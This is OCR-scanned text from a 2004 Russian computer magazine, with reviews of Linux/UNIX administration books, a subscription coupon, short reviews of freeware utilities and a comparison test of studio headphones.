менты RFC и набор полез- 
ных сценариев. 


LINUX 


СПб.: БХВ-Петербург 


Стахнов А. 


Разумная цена: 290 рублей 


Установка, настрой- 

ка и администриро- 
вание Linux. Особенности 
и возможности, идеология 
файловой системы, инс- 
талляция и основные ко- 
манды, компиляция ядра и 
настройка сервисов. Под- 
робно описаны различные 
сервера и службы: элект- 
ронная почта, WWW, FTP, 
INN, прокси, NTP и обеспе- 
чение их безопасности. 
Указаны способы настрой- 
ки рабочих станций, уста- 
новка и настройка графи- 


ческой среды типа Х 
Window, конфигурирова- 
ние принтеров, сканеров, 
КПК, мобильников и про- 
чих внешних девайсов. 


UNIX: ПРАКТИЧЕСКОЕ 
ПОСОБИЕ 
АДМИНИСТРАТОРА 


СПб.: Символ-Плюс 


Разумная цена: 174 рубля 


Книга для тех, кто 

только намылился 
стать администратором 
УМХ. То есть знания дан- 
ной системы не обязатель- 
ны, достаточно быть в кур- 
се того, как работает лю- 
бая многопользовательс- 
кая система (Novell 
Netware, Windows МТ или 
VAX VMS). С помощью 
инструкций в книге можно 
установить и настроить 
систему. Основное внима- 
ние уделено FreeBSD и 
Linux, так как они наибо- 
лее популярны. Рассмот- 
рены установка "стандарт- 
ного" сервера, настройка 
POP3- и IMAP-cepBepos, 
установка и настройка 
СУБД, аутентификация с 
помощью РАМ-модулей и 
русификация. Те, кто уже 
работает с UNIX, могут ис- 
пользовать книгу как 
справочник. 


$АМВА: ИНТЕГРАЦИЯ 
LINUX/UNIX 
КОМПЬЮТЕРОВ В СЕТИ 
WINDOWS 


Часто необходимо 

выбирать между 
Linux и Windows, но неко- 
торые не хотят или не мо- 
гут отказаться от одной 
системы в пользу другой. 
Для этого существует 
Samba - контактная среда 
между Microsoft и Linux. 
Samba позволяет исполь- 


Мн.: Новое знание 


Кюнель 


Разумная цена: 185 рублей 


зовать файлы и принтеры 
Linux/UNIX-cepBepa nog 
Windows 9x/NT, Henocpeg- 
ственно управлять поль- 
зователями МТ, оптималь- 
но комбинировать безо- 
пасность данных и ста- 
бильную работу. Образно 
говоря, Samba придает 
УМХ-системе свойства се- 
ти МТ. Описаны возмож- 
ности Samba, в том числе 
SWAT, поддержка 64-бит- 
ных функций, автомати- 
ческая конфигурация под 
конкретную версию UNIX 
и многое другое. 


UNIX: ВЗАИМОДЕЙСТВИЕ 
ПРОЦЕССОВ 


.: Питер 


Стивенс У. 


Разумная цена: 260 рублей 


Если интересуешься 

разработкой слож- 
ных программ gna UNIX, To 
тебе He обойтись без 
межпроцессорного взаи- 
модействия. В книге рас- 
сказывается об одной из 
его форм - IPC. Описыва- 
ются четыре возможности 
разделения решаемых за- 
дач между несколькими 


процессами или потоками 
одного процесса: переда- 
ча сообщений, синхрони- 
зация, разделяемая па- 
мять и удаленный вызов 
процедур. Разобраны те- 
мы: каналы и FIFO, очере- 
ди сообщений Posix и 
System V, семафоры и ус- 
ловные переменные, бло- 
кировки чтения-записи, 
разделяемая память Posix 
и System V, измерение 
производительности IPC и 
многое другое. 


СЕКРЕТЫ UNIX 


М.: Издательский дом "Вильямс" 


Армстронг (мл.) Джеймс 


Разумная цена: 306 рублей 


Сотни полезных сек- 

ретов UNIX и практи- 
ческих советов по их при- 
менению. Книга состоит из 
множества небольших 
глав, в которых описаны 
нюансы работы и админи- 
стрирования UNIX, от 
простого (управление 
учетными записями, рабо- 
та в оболочках, навигация 
по файловой системе) до 
более сложного (сетевые 
возможности UNIX, сис- 
темное администрирова- 
ние, графические возмож- 
ности). Особое внимание 
уделено вопросам разра- 
ботки собственных прило- 
жений для UNIX. Советы 
экспертов, методики и го- 
товые решения конкрет- 
ных задач. 


СЕТЕВОЕ 
АДМИНИСТРИРОВАНИЕ 
LINUX 


Практическое pyko- 
By BOQCTBO, как поднять 
и настроить локальную 
сеть под управлением 
Linux. Подробное описа- 
ние процессов, происходя- 
щих в сети, и практичес- 
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НЕПРИСТУПНЫЙ 


СПб.: БХВ-Петербург 


Стаханов А. 


Разумная цена: 173 рубля 


кие примеры, которые не 
раз пригодятся в сетевой 
жизни. От первоначальной 
настройки go надежной 
защиты от атак извне. 
Рассматриваются сетевые 
модели, протоколы, адре- 
са, службы, конфигуриро- 
вание сетевых интерфей- 
сов, настройка серверов 
FTP, Proxy, INN, Apache, 
Samba, Mars и т.д. Сетевые 
принтеры, шлюз в инет, 
настройка фаервола, учет 
Tpacpuka и т.п. Приведено 
множество программ для 
обслуживания сети и ее 
безопасности. 


АДМИНИСТРИРОВАНИЕ 
АРАСНЕ 


М.: Издательство "Лори" 


Марк Арнольд 


Разумная цена: 208 рублей 


Не секрет, что 

Apache - наиболее 
популярный web-cepBep. 
Его характеризуют высо- 
кая производительность, 
надежность, безопасность 
и бесплатное распростра- 
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нение. Поэтому было бы 
неплохо владеть навыка- 
ми ежедневной работы по 
администрированию 
Apache, если ты хочешь 
работать в дальнейшем 
администратором. В книге 
приведены пошаговые 
инструкции по обеспече- 
нию безопасности, прог- 
раммированию web-cepBe- 
ра и созданию многодо- 
менных сайтов на одном 
сервере. Описаны сред- 
ства, необходимые для 
создания, запуска и под- 
держки сервера Apache. 
Для продвинутых книга 
послужит отличным нас- 
тольным справочником. 


UNIX: ПОЛЕЗНЫЕ СОВЕТЫ 
ДЛЯ СИСТЕМНЫХ 
АДМИНИСТРАТОРОВ 


М.: ДМК Пресс 


Уэйнгроу 


Разумная цена: 115 рублей 


Книга для пользова- 

телей, знакомых с 
основными функциями и 
особенностями UNIX. По- 
казано, как можно автома- 
тизировать рутинную ра- 
боту и создать командные 
файлы, используя кото- 
рые ты значительно повы- 
сишь производительность. 
Рассмотренные приемы 
автор опробовал в разных 
версиях системы, и можно 
воспользоваться его нара- 
ботками. Более подробно 
рассмотрены: администри- 
рование сети, безопас- 
ность ОС, настройка и ра- 
бота с учетными записями, 
эмуляция терминалов и 
многое другое. 


LINUX ДЛЯ ИНТЕРНЕТА 
И ИНТРАНЕТА 


В книге рассмотрены 
разные случаи при- 


Мн.: Новое знание 


Разумная цена: 197 рублей 


менения (интернет и инт- 
ранет) и дано подробное 
описание необходимой 
конфигурации системы. 
Рассмотрены вопросы инс- 
талляции и настройки сис- 
темы, вопросы безопас- 
ности и использование ин- 
тернет-сервисов. Уделено 
внимание специфичному 
применению: в качестве 
автономного компьютера и 
в качестве сервера (к при- 
меру, чтобы предостав- 
лять услуги провайдера). 


МАРШРУТИЗАЦИЯ 
В LINUX 


М.: Издательский дом "Вильямс" 


Брокмайер Джо 


Разумная цена: 129 рублей 


Основная задача 

книги - помочь гра- 
мотно настроить подсисте- 
му маршрутизации в Linux. 
Для этого изложена тео- 
рия маршрутизации, опи- 
саны основные протоколы 
и утилиты, имеющиеся в 
распоряжении, указаны 
эффективные способы их 


применения на практике. 
Ты научишься конфигури- 
ровать демон маршрутиза- 
ции, освоишь принципы 
бесклассовой адресации в 
стандарте IPv4, узнаешь 
множество сетевых утилит 
Linux, инструменты анали- 
за сетевого трафика, поз- 
накомишься со средства- 
ми защиты сетей, имею- 
щихся в Linux, и gp. 


МАКСИМАЛЬНАЯ 
БЕЗОПАСНОСТЬ В LINUX 


K.: Издательство "ДиаСофт" 


Анонимный автор 


Разумная цена: 249 рублей 


Впервые вижу книгу, 

подписанную ано- 
нимным автором :). Как на- 
писано на обложке, автор 
- опытный компьютерный 
хакер, осужденный за се- 
рию финансовых преступ- 
лений, совершенных пос- 
ле разработки методики 
обхода защиты банкома- 
тов. Срок, видимо, повли- 
ял на человека :), и те- 
перь он пишет книжки. В 
данной книге описаны ды- 
ры в защите Linux-cuctTe- 
мы при стандартной уста- 
новке, рассказано, к чему 
они могут привести при 
подключении компьютера 
к сети и как их прикрыть. 
Предлагаемые рецепты 
позволят тебе достаточно 
быстро повысить безопас- 
ность критически важных 
для работы приложений и 
гарантировать безопас- 
ную работу основных 
служб инета. Описаны 
программы и утилиты для 
выявления и устранения 
слабых мест, а также 
инструментарий взломщи- 
ков, с помощью которого 
ты можешь сам проверить 
свою стойкость к вторже- 


ниям извне. 


Архитектура: XP vs 9x 

Пароли и привелегии 

Сетевые протоколы и службы 
ActiveX под ударом 
Имперсонализация 

Атака на МТЕ$ 

Удаленные атаки 

Игра в прятки: антивирусы, firewall 
Черви 

Вирусные технологии 


Boot и MBR $Ф 
Обнаружение заразы © 

Эмуляторы 

Логи 


Действенные методы аттак, 
как защитить "голую" XP и 
еще 20 причин задуматься о 
безопасности Windows! 


Мифы и реальность. Лучший компьютер для 
геймера, хакера, программера, дизайнера. 
Лушее железо и софт. 


ЗАКАЗ ЖУРНАЛА В РЕДАКЦИИ 


ВЫГОДА 
Цена подписки на 20% ниже, чем в розничной продаже! 
Доставка за счет издателя 

Разыгрываются призы и подарки для подписчиков 
Дополнительные скидки при заказе на длительный срок 


ГАРАНТИЯ 

Вы гарантированно получите все номера журнала 
Цена стабильна на весь период заказа, даже при повышении цены в розничной продаже. 
Единая цена по всей России | мы 


СЕРВИС 

Заказ удобно оплатить через любое отделение банка. 

Заказ оформляется с любого месяца. 

Заказ осуществляется заказной бандеролью или с курьером 

Заказ можно сделать на любое количество месяцев = 


—==— 
Закажи журнал в редакции и сэкономь деньги 


СТОИМОСТЬ ЗАКАЗА НА «ХАКЕР СПЕЦ» + CD . 


115р за номер 


690р за 6 месяцев 


1242р за 12 месяцев (выгода 10%) 


189р 


комплект на 1 месяц (выгода 10%) 


1071р — комплект на 6 месяцев (выгода 15%) 


2016p комплект Ha 12 месяцев (выгода 20%) 


ПОДПИСНОЙ КУПОН 
Прошу оформить подписку: 


[_] нажурнал Хакер Спец + 2 CD 


[_] на комплект Хакер Cney+CD и Железо+Со 


на [ месяцев 


начиная с 


2004 г. 


О Доставлять журнал по почте 
на домашний адрес 


E Доставлять журнал курьером Ha 
адрес офиса (по г. Москве) 


о С * 
Подробнее о курьерской доставке читайте ниже 


(отметьте квадрат выбранного варианта подписки) 


Ф.И.О. 


Извещение 


Кассир 


ИНН 7729410015 


ООО «Гейм Лэнд» 


ЗАО — Международный Московский Банк, г. Москва 


р/с № 40702810700010298407 


к/с № 30101810300000000545 


БИК 044525545 


КПП - 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 


Оплата за « 


С 


Сумма 


месяц 


Ф.И.О. 


Подпись плательщика 


ИНН 7729410015 ООО «Гейм Лэнд» 
Квитанция 
ЗАО — Международный Московский Банк, г. Москва 
дата рожд. LIE . LILI. Li Г. р/с № 40702810700010298407 
АДРЕС ДОСТАВКИ: к/с № 30101810300000000545 
индекс БИК 044525545 КПП - 772901001 
областыкрай Плательщик 
город Адрес (с индексом) 
улица 
дом корпус Назначение платежа Сумма 
и квартира/офис Оплата за « » 
телефон ( ) с _ 2004 г. 
: a Ф.И.О. 
е-тай 
Кассир Подпись плательщика 


сумма оплаты 


КАК ОФОРМИТЬ ЗАКАЗ? 


1. Заполнить купон и квитанцию 
2. Перечислить стоимость подписки через Сбербанк 
3. Обязательно прислать в редакцию копию оплаченной квитанции с четко заполненным купоном любым из 
перечисленных способов: 

© по электронной почте: зибзспбе хз@датеапа.ги; 

© по факсу: 924-9694; 

© по адресу: 107031, Москва, Дмитровский переулок, д. 4, строение 2, OOO «Гейм Лэнд», Отдел подписки. 
По всем вопросам по подписке можно звонить по бесплатному телефону 8-800-200-3-999. 


* Курьерская доставка осуществляется в течении Зх дней после выхода журнала в продажу только по Москве на 
адрес офиса, для оформления доставки курьером укажите адрес и название фирмы в подписном купоне. 


Почтовая подписка Подписка для юридических лиц 


41800 Хакер Спец + CD 16764 Хакер Спец + CD 41800 Хакер Спец + CD www.i nterpochta. ru 


Москва: 000 "Интер-Почта", 
тел.: 500-00-60, 
e-mail: inter-post@sovintel.ru 


a ioe © teh 


ma PP Ho) hee 


Tea РОССИ 


Регионы: OOO "Корпоративная почта", 
тел.: 953-92-02, 
e-mail: kpp@sovintel.ru 


Для получения счета Ha оплату подписки 
нужно прислать заявку с названием жур- 
нала, периодом подписки, банковскими 
реквизитами, юридическим и почтовым 
адресом, телефоном и фамилией ответ- 
ственного лица за подписку. 


Тел.: (095) 974-11-11 Тел.: (095) 974-21-31 Тел.: (095) 974-11-11 


С 1 сентября по 30 ноября вы также можете оформить почтовую подписку 
по каталогам подписных агентств во всех отделениях связи России. Для 
оформления подписки необходимо знать подписной индекс журнала или 
найти его в каталоге по названию. 
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а этот раз твоему вниманию предлагаются свежевыстиранные шаровары и девственно чистые фривары: одна по- 
ловина из них связана с Web, другая - непосредственно с темой номера. Юзай и наслаждайся! 


TAGSCANNER 4.9 БИЛД 490 ВС1 


Мощная программа для организации и управления 

музыкальными архивами. TagScanner переимено- 
вывает сдрайлы MP3/OGG/MP-+ так, чтобы в их имени со- 
держалось информация из тэгов. Также программа позво- 
ляет сгенерировать тэг по имени дфайла/директории или 
по информации из интернет-базы данных freedb.org. 
Встроенный редактор тэгов поможет быстро и удобно об- 
работать необходимую информацию. Также имеется в на- 
личии простой, но удобный редактор плейлистов, позво- 
ляющий сохранять и читать листы в PLS/M3U и экспорти- 
ровать их в HTML и 
таблицы Excel. 
Программа в боль- 
шинстве случаев 
значительно облег- 
чает жизнь, когда 
требуется привести 
в порядок свой му- 
зыкальный архив. 


NETADJUST ANONYMOUS PROXY V5.2.0.0 


Суперпрограмма для подмены истинного |Р-адреса во 

время серфинга. NetAdjust Anonymous Proxy автома- 
том подставит выбранный анонимный проксик и спрячет 
твой IP. Работать с программой легко и приятно :). 
Достаточно выбрать start/autopilot, и Anonymous Proxy вы- 
яснит твой IP, затем автоматически проверит текущие прок- 
си-сервера на работоспособность, уровень анонимности, 
пинги т.9. После проверки произведет сортировку рабочих 
прокси и выбе- 
рет самый быст- 
рый и с высоким 
уровнем аноним- 
ности. Все гото- 
Bo! NetAdjust 
Anonymous 
Proxy проверит 
твой новый IP 
(покажет, естест- 
венно, уже подс- 
тавленный :)) и 
самостоятельно 
сконсригурит ма- 
шину. Ты пол- 
ностью анони- 
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XP-ANTISPY V3.83 


Маленькая бесп- 

латная програм- 
мка, останавливающая 
разные автоапдейты, зап- 
росы, отчеты о багах и 
прочую несанкциониро- 
ванную активность 
Windows ХР. Очень много 
новых фишек, связанных 
с выходом $Р 2. 
Ты можешь снять огра- 
ничение в 10 потоков, 
отключить фаервол, уб- 
рать Security Center, са- 
мостоятельно выставить 
запреты и настроить 
функции некоторых программ (Mediaplayer, MSN 
Messenger, IE6), отключить всякие дурацкие опции в ХР и 
Office и т.д. Программа - супер! Работает напрямую с ре- 
естром. Все бесплатно и правильно! 


мен! NetAdjust Anonymous Proxy может автоматом менять 
прокси через определенное время (по десролту 5 мин.). По 
каждому прокси-серверу можно получить детальную ин- 
формацию (whois). 

Еще один приятный момент - обновление листа прокси-сер- 
веров. Добавлять можно непосредственно IP, брать список 
из txt-cpaiina или сграбить из интернета. Причем web-agpeca 
для сбора прокси можно вбивать свои! 
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Программа для хранения всех твоих паролей. Te- 

перь достаточно помнить всего один пароль (жела- 
тельно подлиннее ;)), который ты вводишь после запуска 
Password Agent. Всю остальную информацию: аккаунты, 
пассы, мыла, аськи, комменты, линки и даже простые за- 
писки программа будет хранить в одном сверхзащищен- 
HOM срайле. 
Работает быстро, весит ———— = 
мало, памяти практи- 
чески не ест, умеет ви- 
сеть в трее, работает 
со всеми версиями 
Виндов... Password 
Agent уже давно при- 
жился у меня - рабо- 
тать с прогой одно 
удовольствие (особен- 
но после "нехитрой" 
регистрации ;))! Индрормацию можно разбить на группы и 
подгруппы (ICQ, FTP, DialUp ит.д.) на твое усмотрение. В 
Password Agent есть собственный генератор паролей с 
богатыми возможнос- 
тями. В ассортименте 
присутствует и удоб- 
ный поиск (если база 
разрослась). 
Ну и, конечно, огром- 
ное количество допол- 
нительных возможнос- 
тей: автозакрытие, ав- 
тоблокирование, авто- 
сохранение, автоочист- 
ка буфера, добавление/редактирование своих колонок и 
пр. До установки Password Agent я перепробовал множе- 
ство програмы, и эта - лучшая. 


Простой и надежный сниффер http-nakeTos. Перехватывает в 
реальном времени всю инфрормацию по данному протоколу, 
поддерживает HTML, XML, GIF, JPG, Flash, Zip, Exe и пр. Поз- 
воляет детально просматривать, кто, когда, откуда и что по- 
лучил. 

Позволяет сканировать разные сети (выбор в настройках, 
само собой ведет подробный лог работы; HTTP Sniffer будет 
весьма полезен администраторам, сетевым юзерам и другим 
любопытным товарищам :) . 
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Отличная утилитка для мониторинга и контроля за 

твоим коннектом. Будет полезна не только 
Фаир'щику, но и людям с выделенкой. DU Meter позволя- 
ет практически сразу определить качество и реальную 
скорость коннекта (при закачке срайлов особенно). 
Поставили срайлы в очередь к товарищу ReGet'y, а сами 
делами занимаемся - красота, окошко программы наверху, 
все наглядно и не отвлекает. Настройки программы прос- 
ты и не требуют детального описания. Скажу только о 
возможности оповещения - при маленькой скорости (по- 
лучено байт за отрезок времени) DU Meter даст голос. 
Имеет смысл переконнектиться. Удобно чрезвычайно. А 
ведение статистики - вообще песня! Выдает полную инфу 
за день, неделю, год... Сколько туда и обратно. Иногда ди- 
BY даешься, можно и на модеме гигабайтами лить :) . Хоро- 
шая прога и почти бесплатная ;). 


Любишь читать книжки прямо с мобилы - качай 

Bookshelf! Он позволяет преобразовать один или 
сразу несколько срайлов с текстом в формате .txt в мид- 
лет, готовый для отправки на мобильный телефон. При за- 
пуске мид- 
лета Ha Te- 
лефоне 
пользова- 
тель полу- 
чает воз- 
можность 
читать 
текст, вклю- 
ченный в 
мидлет. 
В процессе 
обработки 
текста поль- 
зователь имеет возможность выбрать параметры форма- 
тирования текста: шрисрт, межстрочное расстояние ит.д. 
Поддерживает: Siemens SL45i, C55, M50, $55, SL55, 
CX65 (возможно, и другие - He протестировано). Вдобавок 
бесплатна. 


Маленький (всего каких-то 50 кило!), но дюже хоро- 
щий твикер! пота 


Прога позволяет — ИИ ia 
выставить опти- 

1 ща —— a 
мальные настройки зщ о 
системы простой ты [ой 
расстановкой га- —— 
nok. —— > 
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рые параметры Cae) 


системы, IE, серви- 

сы, настройки MediaPlayer и установки десролтового мес- 
сенджера. Если прожка будет развиваться, то с успехом 
заменит XPAntiSpy. 
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С музыкой по жизни 
Тестируем стереонаушники 


Ультракомпактный 
фотоаппарат Сазю ЕХ-240 


Паяльник 
Со скоростью света 


HARD] С МУЗЫКОЙ ПО ЖИЗНИ ) 


Алексей Малашин, test_lab (tesl_lab@gameland.ru) 


С МУЗЫКОЙ- 
ПО ЖИЗНИ 


ТЕСТИРУЕМ СТЕРЕОНАУШНИКИ 


ля теста были выбраны мониторные наушники, поскольку о крупногаба- 
ритных системах уже не раз писалось во всевозможных обзорах. 


оловные телесроны позволя- 
ют отключиться от внешнего 
мира и послушать некоторое 
время приятную музыку на 
нужной громкости, не мешая, 
вместе с тем, окружающим. Все представлен- 
ные модели подходят под класс прилегаю- 
щих к ушам систем стоимостью до $150. 


ТЕХНОЛОГИИ 

Наушники, как и обычная акустика, состоят 
из нескольких основных частей - звуковоспро- 
изводящей мембраны (диферузор), магнита и 
катушки (обеспечивающей раскачку мембра- 
ны в разные стороны), по которой протекает 
электрический сигнал. Для подведения звука к 
ушной раковине динамики располагаются не- 
посредственно около уха, но для комфортной 
работы металл и пластик не подходят, поэтому 
придумали мягкие амбушюры (которые служат 
некоторой прокладкой и контактируют непос- 
редственно с ухом). Как правило, они сделаны 
из звуконепроницаемого материала и облада- 
ют гибкой структурой (чтобы максимально 
удобно охватывать ухо). По способу прилега- 
ния наушники делятся на три типа: 

Circumaural - амбушюры полностью охва- 
тывают ушную раковину; 

Supraaural - амбушюры прилегают к уху; 
Intraaural - вставляющиеся внутрь уха на- 
ушники (не принимали участия в нашем тес- 

тировании). 

Также наушники могут быть закрытыми, 
открытыми и полуоткрытыми. У первых связь 
с внешней средой отсутствует и слышны 
только звуки, воспроизводимые динамиками 
наушников. Недостатками такой конструкции 
являются сравнительно большой вес, отсут- 
ствие вентиляции, гулкость басов, однако на- 
иболее качественное звучание имеют именно 
эти наушники. В открытых наушниках можно 
услышать не только музыку, но и посторон- 


ТЕСТОВЫЙ СТЕНД: 


Материнская плата: ASUS A7V333 (BIOS ver 1018.16) 
Процессор: AMD Athlon(tm) XP 1800+ 1.52GHz 
Память: Hyundai 256Mb DDR PC2700 
Видеокарта: ATI Radeon 9000 
Аудиокарта: Yamaha YMF747 
OC: Windows XP Professional EN Corp Edition (SP2) 
No: Apollo 37zc, Unreal Tournament 2004, WinDVD 5 


Дополнительное оборудование: MPIO FL-100, Casio 
WK-3500, ToshibaTV 


СПИСОК УСТРОЙ 


Sennheiser 
HD 280 Pro 


Sennheiser 
HD 212 Pro 


Sennheiser 
HD 570 


Sennheiser 
HD 500 


Sony MDR 7506 


Sony MDR 7505 


AKG K101 


AKG К271 


AKG K240 


AKG K66 


Nady QH 660 


Nady QH 360 
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ние шумы, зато BCA система в целом 
является компактной и легкой (минус - 
отсутствие глубины у низких частот). 
Третьи же совмещают в себе плюсы 
закрытых и открытых телефонов и яв- 
ляются наиболее удобными для часто- 
го продолжительного использования. 
Чтобы доставить мелодию до слу- 
шателя с минимальными искажения- 
ми, производители придумали ряд 
технологических приемов: для увели- 
чения мощности стали использовать 
специальные магниты из неодима 
(которые более сильные, чем обыч- 
ные), для более естественного звуча- 


Тип: закрытые мониторные, зиргааига! 


ния разработали полимерные мемб- 
раны. Избавиться от потерь сигнала 
помогают провода из бескиспород- 
ной меди, причем разъемы проводов 
покрывают золотом для обеспечения 
более качественного контакта. 


МЕТОДИКА ТЕСТИРОВАНИЯ 

@. Для прослушивания музыки че- 
рез компьютер использовалась прог- 
рамма Apollo, в плей-лист которой бы- 
ли добавлены композиции (разных 
стилей музыки) с битрейтом 190 kbps. 

@. Для оценки воспроизведение 
резких звуков использовалась прог- 


SONY MDR 7505 


Частотный диапазон: 10-25000 Гц 


Искажения: N/A 


Сопротивление: 40 Ом 


Чувствительность: 106 gb 


Регуляторы: складные 


Длина кабеля: 3 м 


Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 


Вес: 220 г 


По характеристикам воспроизведения звука эта модель довольно схожа с Sony МОК 7506. Различия только в 

конструкции. Во-первых, наушники являются больше зирга-, чем circumaural (хотя здесь вопрос неоднозначный), но из- 
за уменьшенных амбушюр ощущается значительный GUCKOMCPOPT при прослушивании музыки более получаса (особенно это 
почувствуют люди, пользующиеся очками, поскольку дужки сильно прижимаются к голове). Во-вторых (и это скорее плюс), 
сами динамики являются откидными и поворотными (сохранилась складная система и добавился разворот на 90 градусов, что 
будет удобным для мониторинга "в одно ухо"). Остальные сфишки, как то: неодимовый магнит, увеличенная мембрана, кабель 
из бескислородной меди и золотое покрытие контактов - по-прежнему имеют место быть. 


рамма Unreal Tournament 2004, где 
особое внимание обращалось на 
воспроизведение всевозможных иг- 
ровых эффектов. 

©. Далее мы использовали компо- 
зиции из пункта 1 на MP3-Flash плеере 
МРЮ FL-100 (чтобы понять, можно ли 
конкретную модель использовать с 
портативной техникой). 

@. На работу с каждой парой науш- 
ников отводилось около двух часов 
для определения удобства посадки и 
степени уставания при длительном 
использовании. 


Тип: полуоткрытые, зиргааига! 


Частотный диапазон: 18-22000 Гц 


Искажения: N/A 


Сопротивление: 19 Ом 


Чувствительность: 101 gb 


Регуляторы: самонастраивающаяся дужка 


Длина кабеля: 3 м 


Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 


Вес: 160 г 


Более всего наушники AKG K101 подходят для использования с карманными плеерами или для работы в качестве звуко- 

вого дополнения компьютера, поскольку специально облегчены и достаточно устойчиво держатся на голове (можно за- 
ниматься спортом). Полуоткрытая конструкция предполагает проникновение части звуков окружающей обстановки, но вместе 
с тем обеспечивается проветривание ушной раковины (что немаловажно при активном образе жизни). Звучание, конечно же, 
не дотягивает до профессиональной НЕЕЁтехники, однако наушники по своим параметрам обгоняют некоторое более дорогие 
аналоги. Низкие частоты воспроизводились достаточно точно и качественно, правда, немного не хватает глубины, а с высоким 
же диапазоном особых проблем замечено не было - звуковая картина четкая и ясная. 


Тип: закрытые мониторные, Circumaural 


Частотный диапазон: 16-28000 Гц 


Искажения: <0.3% 


Сопротивление: 55 Ом 


Чувствительность: 91 gb 


Регуляторы: автоподстраивающаяся дужка 


Длина кабеля: 3 м 


Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 


Вес: 240 г 


АКС К271 представляют собой вариацию закрытых мониторных наушников, и это позволяет избежать наслаивания зву- 

ков внешней среды на музыкальные композиции. Система предназначена для применения в профессиональных целях, 
однако неплохо показала себя и в нашем тесте. Звучание музыки оказалось хорошим (во многом благодаря технологии 
Varimotion, которая обеспечивает естественный звук без искажений во всем диапазоне частот), а конструкция весьма проду- 
манной. При долгой работе с этой акустикой дискомфортные ощущения отсутствуют, а самонастраивающаяся широкая дужка 
обеспечивает надежное и вместе с тем удобное крепление на голове. Съемный кабель длиной три метра имеет с одной сторо- 
ны стандартный мини-джэк (переходничек Ha джэк прилагается), а к наушникам присоединяется стандартный трехпиновый 
(mini-XLR) разьем, так что с заменой провода проблем возникнуть не должно. 
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test_lab 
благодарит 
за 
предоставленное 
на тестирование 
оборудование 
компанию 
«Мультимедиа 
Клуб» 
(т.: 943-92-90). 
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SENNHEISER HD 212 PRO 


Тип: закрытые мониторные, зиргааига! 
Частотный диапазон: 12-19000 Гц / 


Искажения: <0.2% 1 
Сопротивление: 32 Ом | 


Чувствительность: 12 gb у 
= i] 
ai . U EST 
и“ oa" - YY BUY 2004 


Регуляторы: отсутствуют 
Длина кабеля: 3 м 
Штепсель: MiniJack (3.5 мм) + адаптер Ha 6.3 мм 
Вес: 220 г 
Наушники подойдут как профессионалам, так и просто любителям качественного звука. Продвинутые материалы 
позволяют выделить низкие частоты, благодаря чему обеспечивается мощный глубокий (насколько это можно сказать о 
таком типе акустики) бас, что должно понравиться любителям современной ритмичной музыки. Из-за технологии (прилегание к 
ушам) низкие звуки несколько гундят, но высокие частоты вне всяких похвал. Поскольку исполнение прилегающих к ушам 
частей закрытое, можно не волноваться за окружающих, прослушивая композиции даже на очень высокой громкости. При 
длительном использовании возникает некоторый GUCKOMCDOPT - дужка слишком тугая и наушники ощутимо давят. 
Довольно удобна конструкция со снимающимися амбушюрами и возможностью замены отделки (мягкой части) позволяет 
продлить срок службы всей системы. Сделанные из бескислородной меди провода и позолоченные коннекторы исключают 
возникновение посторонних искажений и шумов, а входящий в комплект адаптер на 6.3 мм обеспечивает возможность 
использования системы вместе с профессиональной аппаратурой. 
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SSS ЕЕ! 
Тип: открытые мониторные, Circumaural 
Частотный диапазон: 14-21000 Гц 

Искажения: <0.2% 

Сопротивление: 32 Ом 

Чувствительность: 105 gb 

Регуляторы: отсутствуют 

Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Вес: 210 г 


Конструкция очень похожа на предыдущую, но имеет несколько иные характеристики - меньшее сопротивление позво- 

ляет получить приемлемую мощность (в метро можно забыть о грохоте поезда), а сниженный диапазон частот дает бо- 
лее глубокий бас. Эта система так же достаточно удобна - расширенная дужка снижает нагрузку на голову и позволяет носить 
наушники в течение нескольких часов без отрыва от прослушивания музыки. Амбушюры в отличие от предыдущей модели 
выполнены из кожи (что, как нам кажется, менее удобно), а такой же поворотный механизм обеспечивает "анатомичность" 
принимаемой системой сформы. Более всего эти наушники подходят для мягких композиций (не хард-трэш-рока), где наиболее 
полно проявляются все плюсы устройства. 


SONY MDR 7506 
———————————————— 


Тип: закрытые мониторные, Circumaural 
Частотный диапазон: 10-25000 Гц 

Искажения: <0.05% 

Сопротивление: 63 Ом 

Чувствительность: 106 9Б 

Регуляторы: складные 

Длина кабеля: 3 м 

Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Вес: 230 г 


Высококачественное устройство, произведенное компанией Sony, позволяет полностью погрузиться в мир звуков и за- 

быть обо всем. Музыка, воспроизводимая акустической системой, просто бесподобна (широкий диапазон частот позво- 
ляет во всей красе услышать и гулкий гром тамтамов, и тонкое пение скрипки), причем отлично звучат не только классичес- 
кие, но и современные композиции с четким ритмом. 
О конструкции можно сказать, что она весьма и весьма продуманная, а заявленные тесты на прочность (механические) обе- 
щают выдерживать нагрузки даже в жестких условиях эксплуатации. Наушники умеют складываться в компактный мешочек 
(который входит в комплект) и в этом состоянии занимают очень мало места. Подключаются они к звуковоспроизводящему 
устройству посредством пружинного кабеля (который легко растягивается до трех метров) из бескислородной меди (тем са- 
мым обеспечивается надежный канал для сигнала). Примененные в "ушах" неодимовые магниты обеспечивают повышенную 
мощность и глубину сигнала. 
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Тип: закрытые мониторные, Circumaural 
Частотный диапазон: 8-25000 Гц 

Искажения: <0.1% 

Сопротивление: 64 Ом 

Чувствительность: 102 gB 

Регуляторы: откидные амбушюры 

Длина кабеля: 1-3 м (спиральный шнур) 
Штепсель: MiniJack (3.5 мм) + адаптер на 6.3 мм 
Вес: 285 г 


При первом использовании сразу ощущается немалый вес наушников (по сравнению с другими моделями), однако пос- 

тепенно к этому привыкаешь и особого дискоморорта при работе не чувствуешь. Эта система была разработана в пер- 
вую очередь для ди-джеев (и на радио), а также профессионалов в области музыки. Практически полная изоляция от внеш- 
них шумов и прекрасное воспроизведение композиций действительно возводят ее в ранг отличной системы (нижнюю частоту 
воспроизведения в 8 Гц способно выдать не всякое оборудование). 
В прилагающейся инструкции подробно рассказывается о том, как можно разобрать и заменить практически любую часть сис- 
темы, и о проведении чистки. Складная конструкция амбушюров позволяет без проблем производить транспортировку уст- 
ройства, а их поворот обеспечивает возможность одностороннего мониторинга. Пружинный провод оказывается немного неу- 
добен при использовании совместно с устройствами воспроизведения звука, находящимися с правой стороны, поскольку ка- 
бель будет мешать работе, провисая над руками. 


SENNHEISER HD 574 
SSS SS SS SSS SS) 


Tun: открытые мониторные, circumaural 
